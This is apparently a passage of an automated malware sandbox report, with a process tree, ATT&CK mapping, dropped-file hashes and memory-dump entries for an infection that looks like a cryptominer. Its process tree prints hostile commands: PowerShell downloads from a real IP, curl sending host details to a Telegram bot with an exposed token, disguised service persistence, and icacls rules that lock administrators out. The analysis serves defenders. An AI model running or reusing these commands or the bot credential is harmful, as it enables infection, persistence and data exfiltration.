powershell "(new-object System.Net.WebClient).DownloadFile('http://45.81.224.130/any.exe','c:\windows\migration\any.exe')"
4⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:924

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:3100

\??\c:\windows\migration\any.exe
c:\windows\migration\any.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Windows directory
PID:2240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\windows\migration\any.bat" "
5⤵
- Drops file in Windows directory
PID:1528

C:\Windows\SysWOW64\sc.exe
Sc create TaskSc binPath="C:\programdata\wininit.exe --service" DisplayName="Task Schedubler" type=own start=auto
6⤵
PID:2440

C:\Windows\SysWOW64\sc.exe
Sc create TaskSc binPath= "C:\programdata\wininit.exe --service" DisplayName= "Task Schedubler" type= own start= auto
6⤵
PID:1396

C:\Windows\SysWOW64\net.exe
net start TaskSc
6⤵
PID:4460

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start TaskSc
7⤵
PID:1856

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 15 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:4696

C:\Windows\SysWOW64\net.exe
net stop TaskSc
6⤵
PID:5044

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskSc
7⤵
PID:1644

C:\Windows\SysWOW64\chcp.com
chcp 1251
6⤵
PID:3092

C:\Windows\SysWOW64\mshta.exe
mshta "vbscript:CreateObject("Scripting.FileSystemObject").GetStandardStream(1).Write(Split(Split(CreateObject("Scripting.FileSystemObject").OpenTextFile(".tmp").ReadAll(),"Client-ID:")(1),".")(0))&Close()"
6⤵
PID:2332

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:4716

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq Superfetch.exe"
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3100

C:\Windows\SysWOW64\find.exe
find /I /N "Superfetch.exe"
4⤵
PID:2180

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(new-object System.Net.WebClient).DownloadFile('http://45.81.224.130/curl.exe','c:\windows\curl.exe')"
4⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .
4⤵
PID:5084

C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC CPU Get Name /Value
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3516

C:\Windows\SysWOW64\findstr.exe
FindStr .
5⤵
PID:4012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="
4⤵
PID:3068

C:\Windows\SysWOW64\find.exe
FIND.EXE "="
5⤵
PID:208

C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC /Node:localhost Path Win32_VideoController Get Name /Value
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2332

C:\Windows\SysWOW64\find.exe
find /I /N "Superfetch.exe"
4⤵
PID:1988

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq Superfetch.exe"
4⤵
- Enumerates processes with tasklist
PID:204

\??\c:\windows\curl.exe
c:\windows\curl.exe --insecure --data chat_id="552691400" --data parse-mode=markdown --data-urlencode text="TWJYXOULCORE2Intel Core Processor (Broadwell)Microsoft Basic Display AdapterSERVICE WMService RUN" "https://api.telegram.org/bot"5086556714:AAF7DbEW7CWKb1GEIy6_inxVlrGJ39JUUBM"/sendMessage"
4⤵
- Executes dropped EXE
PID:2940

C:\windows\tasks\Wmiic.exe
C:\windows\tasks\Wmiic.exe
1⤵
- Executes dropped EXE
PID:3464

C:\windows\tasks\IntelConfigService.exe
"IntelConfigService.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3568

C:\Windows\Tasks\Wrap.exe
C:\Windows\Tasks\Wrap.exe
3⤵
- Executes dropped EXE
PID:1416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized
4⤵
PID:912

C:\Windows\Tasks\ApplicationsFrameHost.exe
C:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized
5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "%username%:(R,REA,RA,RD)"
3⤵
PID:1580

C:\Windows\system32\icacls.exe
icacls C:\Windows\Tasks /deny "TWJYXOUL$:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
3⤵
PID:3632

C:\Windows\system32\icacls.exe
icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
3⤵
PID:2052

C:\Windows\system32\icacls.exe
icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4516

C:\Windows\Tasks\Superfetch.exe
C:\Windows\Tasks\Superfetch.exe
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:1100

C:\Windows\Tasks\MSTask.exe
C:\Windows\Tasks\MSTask.exe
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4480

C:\Windows\TEMP\~MpDF78.tmp\~Ma4650.exe
"C:\Windows\TEMP\~MpDF78.tmp\~Ma4650.exe" /p"C:\Windows\Tasks\MSTask.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5092

C:\programdata\wininit.exe
C:\programdata\wininit.exe --service
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:4916

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

New Service

T1050

Modify Existing Service

T1031

Privilege Escalation

New Service

T1050

Defense Evasion

File Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Process Discovery

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\migrate.exe
Filesize
6.6MB

MD5
27216b55a4915b7b0a845367bfe7be2b

SHA1
6e4599d5f5d981079902ac44dc002257af0f9f97

SHA256
70df9144efd8eb4aac981ea0f4c2b71aa6e3165c93a1a1a17465c95a9eefc2d7

SHA512
6b0895b7d84d0b706bf5bd6a3396e65f591d5de6291307805ab897f89ce0bb4fe835864d43cc8ac15c54494f218a2971ec13e589cc50c1ee9e7b04d32d2d9e00

Download Submit
C:\ProgramData\wininit.exe
Filesize
3.0MB

MD5
5eb90fbd6a3a7717813147268893adb3

SHA1
4ee216a39f727f01c08ccbac3d7d756fa35369da

SHA256
7cf373ee6f3c51395f32c24ada5ee4166ceeee295f8a701ab47531c63c1030fa

SHA512
0aee3ecf0517b2545b79a38ce4ae789753eb68d818d115991c2bfa7c857bab3a964f02e538bd6ef3a4000fafafd2ca9cb60ff6fc4edca09eec673514ce78618a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
e9438c233c4143409d34b8d653c7784d

SHA1
7c5e8794ba92152ed2d3b4d0e0277ae230477c4a

SHA256
801cc2f56ff2c14dbf323212514348c9f17709deb625f1fb0b9b2923997bebe4

SHA512
7f6dd2406ca7b49c685b07883ab815158662db2baf3250660329710c7fccdee9a328692027a920a2f8720a963087375d1d885ce288d313d83d0d87f4ceb25d11

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
e5110fe887aa824c9b9b0780445d1ebe

SHA1
1abf5209cbf53d1098bfe71257cd54920d7b9f1f

SHA256
dd8da3f282c5b8e898a06e734ca236427a4e758dd2df2d62349ebe6c0546eb1b

SHA512
2f81219ffec17a6ad4ab7ff062697640cbca29d356998934db1dd620c523f22d8d010169e95b0c5d6a7fe38a776f537a97db0ab2b78511e83df09f5aee977c91

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
16KB

MD5
d40fbeb56e66c43e39910414bc1bdaf3

SHA1
521225370d759587abd9cd0953dfd41f1d15416a

SHA256
f727d407c91f0fb57a66102b3e6e913f6538733dfd7c6cab20bd6701089e4dba

SHA512
a9e0d468b72192978864cf732a2e4ade0f12244f32b0cd3fc5c761f1d227dc1ada377a9ed8a6b9331a10e9df19d9fec939200c4d9aa99be14524a48252d145ed

Download Submit
C:\Windows\Migration\.tmp
Filesize
92KB

MD5
8250794fe5e40794bacc05dd2350af96

SHA1
d05fc6fae9476c0963e4a380e264801cf6e82e98

SHA256
95b652c92d7d623633bb309ae5af35bb85128b6eef579da92545ecf87f18d4a5

SHA512
0bdee284c8d4553fd9160e89f1db3964004af4f85381ab229900bea1a5ed1900f30e51d20d278c5c929159733b1cae0527d914bae93877eaa72a9fdaaf316c9e

Download Submit
C:\Windows\Migration\any.exe
Filesize
3.3MB

MD5
447be2890d99477c8237d3c72f69e442

SHA1
4b139f515cee56f20b084060a6dabf8830475e8d

SHA256
20d3c10c49dcbd585d3481d3f0177e814ec3282e1b2bdd202f734005546f9b4c

SHA512
fedcc9ab462e6376a35d3143a697dc0e038eb32d42da395be07a741501cfa7d299a119a608f47ebb36e1f767d1f45184994cc1d14397dfb24fdf08ec20f283a6

Download Submit
C:\Windows\TEMP\~MpDF78.tmp\PlayerAssistant.dll
Filesize
64KB

MD5
1dff2e673c8801edcd8ded325a774c7f

SHA1
d3c0e1eb71f1c22b825b3a798f154e586fbccdba

SHA256
d08c2478fd924c69a7a3fc84e767d6e32feedda1d7ce3a8cd21eda32c2328003

SHA512
04ce499e5a27c6c359d0ba62db2d90e2e129ca035e7d44e71ea7f44c2aaf9e6b8ee65a15af37157e24d22155d30a38dcd94650073caca9903ed7e42f44422d9f

Download Submit
C:\Windows\TEMP\~MpDF78.tmp\SureKeyboardState.dll
Filesize
63KB

MD5
8110a3c2e92470944acf50dd71521eca

SHA1
9eef6d02b1d8afc5a560010ff0af34c8b2a4dd06

SHA256
94fc90f9d35414bc718bb139f0dab566d2a711093d95e9c955c0603fd14b08f0

SHA512
27603698274dd1cab8634e8b625704a7254ebffbb3c14e337964450ed2f149104168bcffd1b2f492f1c657f9fb61bf828b035fdc8aa8ef399781e34ff85f3793

Download Submit
C:\Windows\TEMP\~MpDF78.tmp\~Ma4650.exe
Filesize
3.5MB

MD5
3c484fb37f284317f9f8bfca1a606591

SHA1
69960c91129a84effa4160babdb1e18d671b3a91

SHA256
6ea403b319633f30b47502a46753d3c73885705e1b51838e9e26ab000b4d44df

SHA512
315173777f42f594ddaec8e91de877fd1f79cb953bb09d3baefee715fa8b2bbd75cf8fa72b22d411df4e244fc1d318a5920d95510107ca436d0b1f7c2b099610

Download Submit
C:\Windows\Tasks\ApplicationsFrameHost.exe
Filesize
8.4MB

MD5
9e02819c5e84a3d8ff67b8cd8ce46b7a

SHA1
138948b1c856314768a066410800bf76909da4eb

SHA256
dca683e92020e2f44762d4b3eb49e5d000d1f8b30f86b77d4b08ac351dc35637

SHA512
54853bef6d435bcb19ff59f30dde8898124508e96ea333b382bea3bb9f26d4366537daca6a05799ddb257b94f8f7733cd9be99f3098631c372143574c002a3a6

Download Submit
C:\Windows\Tasks\ApplicationsFrameHost.exe
Filesize
8.4MB

MD5
9e02819c5e84a3d8ff67b8cd8ce46b7a

SHA1
138948b1c856314768a066410800bf76909da4eb

SHA256
dca683e92020e2f44762d4b3eb49e5d000d1f8b30f86b77d4b08ac351dc35637

SHA512
54853bef6d435bcb19ff59f30dde8898124508e96ea333b382bea3bb9f26d4366537daca6a05799ddb257b94f8f7733cd9be99f3098631c372143574c002a3a6

Download Submit
C:\Windows\Tasks\IntelConfigService.exe
Filesize
1.8MB

MD5
58e4115267b276452edc1f541e3a8198

SHA1
ec40b6cce5c9a835563c17da81997e8010ac9cad

SHA256
713120bac7807f6fc0a6050135556c0614a66be2fb476cfe163877f3d03b4d08

SHA512
3def4b7f7fbeab01826eb733174bca64860f8bfbad3baec361b65b07b4558e28830fcc2deb264622199f9474277f04e562830bc5f0bf8a0e7932d002f1a812c5

Download Submit
C:\Windows\Tasks\MSTask.exe
Filesize
4.1MB

MD5
815ac943fb14eb69d059299c89136de3

SHA1
c4cedd22bf42f46da0dd19f57e0859554c5898e1

SHA256
1670a91ec9d1bf2a75378d3c56c36a069ad628adbd6c8c6d3dd31691a1ca4c4d

SHA512
65829e721f522f99d0cdb4ce64b6e03095c71a5dc8ba8ab409ec56b18e77ee2e96daa07dc11ea3df0e6d0aaee9b2461ad57f17c240a3ac145e257641a430dbe5

Download Submit
C:\Windows\Tasks\MSTask.exe
Filesize
4.1MB

MD5
815ac943fb14eb69d059299c89136de3

SHA1
c4cedd22bf42f46da0dd19f57e0859554c5898e1

SHA256
1670a91ec9d1bf2a75378d3c56c36a069ad628adbd6c8c6d3dd31691a1ca4c4d

SHA512
65829e721f522f99d0cdb4ce64b6e03095c71a5dc8ba8ab409ec56b18e77ee2e96daa07dc11ea3df0e6d0aaee9b2461ad57f17c240a3ac145e257641a430dbe5

Download Submit
C:\Windows\Tasks\Superfetch.exe
Filesize
1.6MB

MD5
362ffce5c7c480702a615f1847191f62

SHA1
75aceaea1dfba0735212c2ab5cafc49257927f73

SHA256
9e24c7b4604aa3022325b62154ac80dc76533fa96a3418d8e15d28c998fb9c53

SHA512
9a71825a4e111c89e193f799f5cd0f38bf753137bf669040254eb5ecfbeb1e7fb161451320592832381b6ae7a95b015ef8e9192ab10ad41e113bad35dde7d15f

Download Submit
C:\Windows\Tasks\Superfetch.exe
Filesize
1.6MB

MD5
362ffce5c7c480702a615f1847191f62

SHA1
75aceaea1dfba0735212c2ab5cafc49257927f73

SHA256
9e24c7b4604aa3022325b62154ac80dc76533fa96a3418d8e15d28c998fb9c53

SHA512
9a71825a4e111c89e193f799f5cd0f38bf753137bf669040254eb5ecfbeb1e7fb161451320592832381b6ae7a95b015ef8e9192ab10ad41e113bad35dde7d15f

Download Submit
C:\Windows\Tasks\WinRing0x64.sys
Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
C:\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
C:\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
C:\Windows\Tasks\Wrap.exe
Filesize
1.0MB

MD5
1006dab1f856d5dd0d143893af79dd96

SHA1
debf139adfb779e519e1d3cb506794989aade417

SHA256
5992923c30024991ab8af2d514224d1f282ce84b84b499dd490ce93f0b60593e

SHA512
d989dc195c695bdb0e2343a5e677e36a818aa8d7a7228bc5cfc4aeb9bd6e33eb76bcaefc5476bfbc49bb78b27e1e9b221154b57c329ae6bda5fbccb090f5236e

Download Submit
C:\Windows\Tasks\Wrap.exe
Filesize
1.0MB

MD5
1006dab1f856d5dd0d143893af79dd96

SHA1
debf139adfb779e519e1d3cb506794989aade417

SHA256
5992923c30024991ab8af2d514224d1f282ce84b84b499dd490ce93f0b60593e

SHA512
d989dc195c695bdb0e2343a5e677e36a818aa8d7a7228bc5cfc4aeb9bd6e33eb76bcaefc5476bfbc49bb78b27e1e9b221154b57c329ae6bda5fbccb090f5236e

Download Submit
C:\Windows\Tasks\config.json
Filesize
2KB

MD5
539a1647d56a708ef272fb6e6dc44ce0

SHA1
4650663f175cee001f7007644064b9c3ee557e4a

SHA256
a7e5316f965df9c2d1fd93ff3effb69f6dd4a416e6ba38e6f3644cb74b4a308b

SHA512
54ab7feec62eb812de9de32f59b583cfbf9878a55e1378878fe0b7def85418102b2daa592b98c142cfddec7c53c5f80ce99c52e29be61567195514976550bcd9

Download Submit
C:\Windows\Temp\~MpDF78.tmp\PlayerAssistant.dll
Filesize
64KB

MD5
1dff2e673c8801edcd8ded325a774c7f

SHA1
d3c0e1eb71f1c22b825b3a798f154e586fbccdba

SHA256
d08c2478fd924c69a7a3fc84e767d6e32feedda1d7ce3a8cd21eda32c2328003

SHA512
04ce499e5a27c6c359d0ba62db2d90e2e129ca035e7d44e71ea7f44c2aaf9e6b8ee65a15af37157e24d22155d30a38dcd94650073caca9903ed7e42f44422d9f

Download Submit
C:\Windows\Temp\~MpDF78.tmp\SureKeyboardState.dll
Filesize
63KB

MD5
8110a3c2e92470944acf50dd71521eca

SHA1
9eef6d02b1d8afc5a560010ff0af34c8b2a4dd06

SHA256
94fc90f9d35414bc718bb139f0dab566d2a711093d95e9c955c0603fd14b08f0

SHA512
27603698274dd1cab8634e8b625704a7254ebffbb3c14e337964450ed2f149104168bcffd1b2f492f1c657f9fb61bf828b035fdc8aa8ef399781e34ff85f3793

Download Submit
C:\Windows\Temp\~MpDF78.tmp\gslib_ui_defresu.dll
Filesize
250KB

MD5
3fa6b348f74d0099fc30f9e383a9ada7

SHA1
880360ed156fc6cb31f8f4538b5df47974e1472e

SHA256
3fd5732a89604bfde4c49836e05cff838cd9bc489a4b901daf22acf55b28f4dc

SHA512
71fa40ab547ce941870a64c90e7113c4a8e650ec07909416562575afeff55429e9d61d308ff2a8993d28cce336811c6ede5d8255d07ab283d7a11e03cf744c4a

Download Submit
C:\Windows\Temp\~MpDF78.tmp\~Ma4650.exe
Filesize
3.5MB

MD5
3c484fb37f284317f9f8bfca1a606591

SHA1
69960c91129a84effa4160babdb1e18d671b3a91

SHA256
6ea403b319633f30b47502a46753d3c73885705e1b51838e9e26ab000b4d44df

SHA512
315173777f42f594ddaec8e91de877fd1f79cb953bb09d3baefee715fa8b2bbd75cf8fa72b22d411df4e244fc1d318a5920d95510107ca436d0b1f7c2b099610

Download Submit
C:\Windows\curl.exe
Filesize
5.2MB

MD5
104023cef829fce3e34bf1514daff629

SHA1
b6e7b949109298ec7ff1aa64404a859b5b41ccae

SHA256
15b1158d806de14013fdc3f0e81dca725481d2393249994a122c0a70721ae9f5

SHA512
efebee49ffebf0dcb07c6e7d24477101a7c8a2a03b0bea4df9c1054943823026ffd46f54cc51fb8de062e3641f021d5cf0b23ed67d46a549ee23e5fa7b12be1e

Download Submit
C:\programdata\ru.bat
Filesize
32B

MD5
11e08b5abf3f1675f99c96f78c128b23

SHA1
40d6dd08262ef959328aec4dc5ed07532232037c

SHA256
50ac09332ff9d6521244b4f9cf6fd9cc489b3324ed1316e07f6a5904230397e7

SHA512
3005767016b4c5da031fb2ac5288b01821d54768b5e099e1157d4fa4621a078d589e54d9c5c89ded58ac3ca94395dacbf1d840f9210f909d3c9dfe8092de8ff9

Download Submit
C:\programdata\wininit.exe
Filesize
3.0MB

MD5
5eb90fbd6a3a7717813147268893adb3

SHA1
4ee216a39f727f01c08ccbac3d7d756fa35369da

SHA256
7cf373ee6f3c51395f32c24ada5ee4166ceeee295f8a701ab47531c63c1030fa

SHA512
0aee3ecf0517b2545b79a38ce4ae789753eb68d818d115991c2bfa7c857bab3a964f02e538bd6ef3a4000fafafd2ca9cb60ff6fc4edca09eec673514ce78618a

Download Submit
C:\windows\migration\any.bat
Filesize
1KB

MD5
820e231cced7dd284bca641bae7e4f7f

SHA1
84006f6aa9eb42dcbf5561b4a581c83e15e9058a

SHA256
1c6c567df282f77e51b4fe86cec37e8a9910374a6196216a55d35a674478ed25

SHA512
14e056b01061bc665f9ead489bc42cb201b846cc05ff9a3172ad22a1d106d31a25a6edf48eb841aa516ced60d105d5495bd00b89bef71661f15d7b9a2953e87f

Download Submit
C:\windows\tasks\IntelConfigService.exe
Filesize
1.8MB

MD5
58e4115267b276452edc1f541e3a8198

SHA1
ec40b6cce5c9a835563c17da81997e8010ac9cad

SHA256
713120bac7807f6fc0a6050135556c0614a66be2fb476cfe163877f3d03b4d08

SHA512
3def4b7f7fbeab01826eb733174bca64860f8bfbad3baec361b65b07b4558e28830fcc2deb264622199f9474277f04e562830bc5f0bf8a0e7932d002f1a812c5

Download Submit
C:\windows\tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
C:\windows\tasks\run.bat
Filesize
489B

MD5
8098a70564ca959e392fea0b77e05b6f

SHA1
4f7943d6e30839293cbe1dc0dc4dbd5fb3fc1d78

SHA256
47cd7dd51cad3ebc215d3ee835c2f0a4ea9785300e03cd3e6b4ea1195c557807

SHA512
b5d610564d8af52648b2cbb83fc94b48393a68e71f15ab8f56e5c0063aa0034ec37943e36160a1770cf538d799eb92e55b83332fde1a82b11ada92220fc5c8f3

Download Submit
\??\c:\Programdata\anydesk\ad_svc.trace
Filesize
92KB

MD5
8250794fe5e40794bacc05dd2350af96

SHA1
d05fc6fae9476c0963e4a380e264801cf6e82e98

SHA256
95b652c92d7d623633bb309ae5af35bb85128b6eef579da92545ecf87f18d4a5

SHA512
0bdee284c8d4553fd9160e89f1db3964004af4f85381ab229900bea1a5ed1900f30e51d20d278c5c929159733b1cae0527d914bae93877eaa72a9fdaaf316c9e

Download Submit
\??\c:\programdata\migrate.exe
Filesize
6.6MB

MD5
27216b55a4915b7b0a845367bfe7be2b

SHA1
6e4599d5f5d981079902ac44dc002257af0f9f97

SHA256
70df9144efd8eb4aac981ea0f4c2b71aa6e3165c93a1a1a17465c95a9eefc2d7

SHA512
6b0895b7d84d0b706bf5bd6a3396e65f591d5de6291307805ab897f89ce0bb4fe835864d43cc8ac15c54494f218a2971ec13e589cc50c1ee9e7b04d32d2d9e00

Download Submit
\??\c:\programdata\st.bat
Filesize
3KB

MD5
a4355470a8f18c272559306aeb81d7c7

SHA1
d38b25db4da4a14bbc77b01460dd2e4e938badb0

SHA256
109a5870e28ce94a7addff3a35ab4291ada7d7be87befed1edca2f729437ac08

SHA512
b8c2c5259b448f847b883ca7b13c4d92c896148d15eb5ee8c7f3084bf8b7a75af722f6cdbeabe1a6c67346d2958ddece6d7d568d39d70df2135f7514393ab94a

Download Submit
\??\c:\windows\migration\any.exe
Filesize
3.3MB

MD5
447be2890d99477c8237d3c72f69e442

SHA1
4b139f515cee56f20b084060a6dabf8830475e8d

SHA256
20d3c10c49dcbd585d3481d3f0177e814ec3282e1b2bdd202f734005546f9b4c

SHA512
fedcc9ab462e6376a35d3143a697dc0e038eb32d42da395be07a741501cfa7d299a119a608f47ebb36e1f767d1f45184994cc1d14397dfb24fdf08ec20f283a6

Download Submit
\??\c:\windows\migration\wininit.exe
Filesize
3.0MB

MD5
5eb90fbd6a3a7717813147268893adb3

SHA1
4ee216a39f727f01c08ccbac3d7d756fa35369da

SHA256
7cf373ee6f3c51395f32c24ada5ee4166ceeee295f8a701ab47531c63c1030fa

SHA512
0aee3ecf0517b2545b79a38ce4ae789753eb68d818d115991c2bfa7c857bab3a964f02e538bd6ef3a4000fafafd2ca9cb60ff6fc4edca09eec673514ce78618a

Download Submit
\??\c:\windows\temp\~mpdf78.tmp\gslib_ui_defresu.dll
Filesize
250KB

MD5
3fa6b348f74d0099fc30f9e383a9ada7

SHA1
880360ed156fc6cb31f8f4538b5df47974e1472e

SHA256
3fd5732a89604bfde4c49836e05cff838cd9bc489a4b901daf22acf55b28f4dc

SHA512
71fa40ab547ce941870a64c90e7113c4a8e650ec07909416562575afeff55429e9d61d308ff2a8993d28cce336811c6ede5d8255d07ab283d7a11e03cf744c4a

Download Submit
memory/384-158-0x0000000000000000-mapping.dmp

Download
memory/460-246-0x00000000000B0000-0x0000000000CE2000-memory.dmp

Filesize
12.2MB

Download
memory/460-244-0x00000000000B0000-0x0000000000CE2000-memory.dmp

Filesize
12.2MB

Download
memory/808-167-0x0000000000000000-mapping.dmp

Download
memory/908-199-0x0000000000000000-mapping.dmp

Download
memory/912-197-0x0000000000000000-mapping.dmp

Download
memory/924-204-0x0000000000000000-mapping.dmp

Download
memory/1092-155-0x0000000070600000-0x000000007064C000-memory.dmp

Filesize
304KB

Download
memory/1092-152-0x0000000000000000-mapping.dmp

Download
memory/1100-213-0x0000000000000000-mapping.dmp

Download
memory/1396-240-0x0000000000000000-mapping.dmp

Download
memory/1416-193-0x0000000000000000-mapping.dmp

Download
memory/1480-165-0x0000000000000000-mapping.dmp

Download
memory/1528-235-0x0000000000000000-mapping.dmp

Download
memory/1580-195-0x0000000000000000-mapping.dmp

Download
memory/1616-181-0x0000000000000000-mapping.dmp

Download
memory/1672-179-0x0000000000000000-mapping.dmp

Download
memory/1856-242-0x0000000000000000-mapping.dmp

Download
memory/1940-229-0x0000000000000000-mapping.dmp

Download
memory/1944-175-0x0000000000000000-mapping.dmp

Download
memory/2008-211-0x0000000000000000-mapping.dmp

Download
memory/2052-196-0x0000000000000000-mapping.dmp

Download
memory/2068-160-0x0000000000000000-mapping.dmp

Download
memory/2156-178-0x0000000000000000-mapping.dmp

Download
memory/2180-182-0x0000000000000000-mapping.dmp

Download
memory/2180-250-0x0000000000000000-mapping.dmp

Download
memory/2240-232-0x0000000000000000-mapping.dmp

Download
memory/2296-151-0x0000000000000000-mapping.dmp

Download
memory/2376-231-0x0000000000000000-mapping.dmp

Download
memory/2440-239-0x0000000000000000-mapping.dmp

Download
memory/2476-164-0x0000000000000000-mapping.dmp

Download
memory/3100-249-0x0000000000000000-mapping.dmp

Download
memory/3100-230-0x0000000000000000-mapping.dmp

Download
memory/3312-168-0x0000000000000000-mapping.dmp

Download
memory/3360-163-0x0000000000000000-mapping.dmp

Download
memory/3516-254-0x0000000000000000-mapping.dmp

Download
memory/3568-190-0x0000000000000000-mapping.dmp

Download
memory/3616-173-0x0000000000000000-mapping.dmp

Download
memory/3632-198-0x0000000000000000-mapping.dmp

Download
memory/3648-228-0x000001FADCDC0000-0x000001FADCE00000-memory.dmp

Filesize
256KB

Download
memory/3648-258-0x000001FAED200000-0x000001FAED220000-memory.dmp

Filesize
128KB

Download
memory/3648-200-0x0000000000000000-mapping.dmp

Download
memory/3648-203-0x000001FADCD80000-0x000001FADCDA0000-memory.dmp

Filesize
128KB

Download
memory/3652-251-0x0000000000000000-mapping.dmp

Download
memory/3796-162-0x0000000000000000-mapping.dmp

Download
memory/3828-188-0x0000000000000000-mapping.dmp

Download
memory/3880-176-0x0000000000000000-mapping.dmp

Download
